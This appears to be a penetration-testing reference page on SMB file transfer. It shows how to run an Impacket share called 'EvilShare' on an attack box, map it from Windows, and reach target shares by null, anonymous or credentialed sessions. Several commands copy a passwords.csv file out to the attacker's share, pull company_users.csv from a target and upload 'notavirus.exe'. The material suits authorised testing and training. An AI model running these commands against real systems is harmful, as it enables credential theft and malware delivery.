Skip to main content

SMB

SMB Server on Attack Box

For this, we can use Impacket's smbserver.py script to run an ad-hoc SMB server. There are two required arguments:

  • Share Name
  • Share Path

You can also configure the SMB server with:

  • Username + Password authentication
  • NTLM hash authentication
  • Specific IP binding
  • Specific port binding (TCP/445 is default)
  • And more...

Impacket SMB Server

The Kali Linux developers have created a series of wrappers around Impacket scripts. In this case, you can easily invoke smbserver.py by running impacket-smbserver

impacket-smbserver -h

smbserver.py help output

impacket-smbserver -smb2support EvilShare /tmp

Serve an anonymous SMB share called "EvilShare" from the /tmp directory on attack box

impacket-smbserver -smb2support -username 'secretuser' -password 'secretpass' EvilShare /tmp

Serve a credentialed SMB share called "EvilShare" from the /tmp directory on attack box


Windows Client

cmd.exe

Map the Share

Map the Share Anonymously

Not supported by default on most current versions of Windows due to security policy

net use Z: \\kali.cyber.range\EvilShare

Map "EvilShare" from Attack Box to drive Z:

Map the Share with Credentials

See above for command to start SMB server on attack box with credentials

net use Z: \\attackbox-ip-address\EvilShare /user:secretuser 'secretpass'

Map "EvilShare" from Attack Box to drive Z: with required credentials 

Interacting with the Share
dir Z:\

"EvilShare" is mapped to Z:, list contents in share

dir Z:\filename.txt

List filename.txt in the share

copy Z:\filename.txt C:\Windows\Temp\filename.txt

Copy filename.txt to the system temporary directory

copy C:\Users\john.doe\passwords.csv Z:\

Copy passwords.csv to the share


powershell.exe

PowerShell "SmbShare" Module
  • Requires PowerShell v5+ and Windows 10 or newer
  • See PSDrive cmdlets below for older clients
  • PowerShell supports legacy cmd binaries, so net use is also an option

Map the Share Anonymously

Not supported by default on most current versions of Windows due to security policy

New-SmbMapping -LocalPath 'Z:' -RemotePath \\kali.cyber.range\EvilShare

Map "EvilShare" from Attack Box to drive Z:

Map the Share with Credentials

See above for command to start SMB server on attack box with credentials

New-SmbMapping -LocalPath 'X:' -RemotePath \\kali.cyber.range\EvilShare -UserName 'secretuser' -Password 'secretpass'

Map "EvilShare" from Attack Box to drive Z: with required credentials

Disconnect the Share

Remove-SmbMapping -LocalPath 'Z:' -Force

PowerShell "PSDrive" Cmdlets

Map the Share Anonymously

Not supported by default on most current versions of Windows due to security policy

New-PSDrive -Name 'Z' -PSPRovider FileSystem -Root \\attackbox-ip-address\EvilShare

Map "EvilShare" from Attack Box to drive Z:

Map the Share with Credentials

See above for command to start SMB server on attack box with credentials

$username = 'secretuser'
$password = 'secretpass' | ConvertTo-SecureString -AsPlaintext -Force
$credential = New-Object PSCredential -ArgumentList $username,$password
New-PSDrive -Name 'Z' -PSPRovider FileSystem -Root \\attackbox-ip-address\EvilShare -Credential $credential

Map "EvilShare" from Attack Box to drive Z: with required credentials

Disconnect the Share

Remove-PSDrive -Name 'Z'

Interacting with the Share
Get-ChildItem Z:\

"EvilShare" is mapped to Z:, list contents in share

Get-ChildItem Z:\filename.txt

List filename.txt in the share

Copy-Item Z:\filename.txt C:\Windows\Temp\filename.txt

Copy filename.txt to the system temporary directory

Copy-Item C:\Users\john.doe\passwords.csv Z:\

Copy passwords.csv to the share

SMB Server on Target

Attack Box as Client

Null Session

smbclient -N -L //target-ip-address --option="client min protocol=core"

Attempt null session listing of shares

smbclient -N //target-ip-address/HRDrive --option="client min protocol=core"

Open the "HRDrive" share from the target with a null session

 

Anonymous Authentication

smbclient -L //target-ip-address -U '' --option="client min protocol=core"

Attempt to list any available shares anonymously

smbclient //target-ip-address/HRDrive -U '' --option="client min protocol=core"

Open the "HRDrive" share from the target anonymously

Credentialed Authentication

For local authentication, remove the DOMAIN.TLD/ prefix

smbclient -L //target-ip-address -U 'DOMAIN.TLD/username%password' --option="client min protocol=core"

List shares on the server using a username and password

smbclient //target-ip-address/HRDrive -U 'DOMAIN.TLD/username%password' --option="client min protocol=core"

Open the "HRDrive" share from the target with username and password

Interacting with the Share

smb: \> ls

List contents of the "HRDrive" share

smb: \> get company_users.csv /tmp

Download the company_users.csv file from the share to the /tmp folder locally

smb: \> put /tmp/notavirus.exe notavirus.exe

Copy the file notavirus.exe from /tmp locally to the "HRDrive" share

Back to top